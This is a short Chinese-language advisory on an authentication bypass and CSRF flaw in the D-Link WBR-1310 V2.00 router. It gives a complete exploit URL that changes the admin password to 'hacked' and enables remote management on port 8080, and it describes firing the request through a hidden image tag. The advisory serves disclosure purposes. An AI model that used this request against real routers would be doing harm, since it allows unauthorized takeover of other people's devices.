D-Link WBR-1310 Authentication Bypass Vulnerability
漏洞概述
WBR-1310允许远程用户修改管理配置进行授权绕过,在未开启远程管理时也可以通过CSRF触发。
影响产品
WBR-1310 V2.00
漏洞描述
CGI脚本未进行有效的登录凭据验证。可通过构造HTTP请求修改管理设置。
修改管理员密码为 hacked,并开启8080端口允许远程访问
http://192.168.0.1/tools_admin.cgi? admname=admin&admPass1=hacked&admPass2=hacked&username=user&userPass1=WD B8WvbXdHtZyM8&userPass2=WDB8WvbXdHtZyM8&hip1=*&hport=8080&hEnable=1
可通过CSRF漏洞发送GET请求触发
漏洞影响
允许远程管理,接管路由器
通过web页面隐藏image tag,触发链接修改管理员密码和允许远程连接
修复建议
升级固件
参考资料
http://www.devttys0.com/wp-content/uploads/2010/12/wbr310_auth_bypass.pdf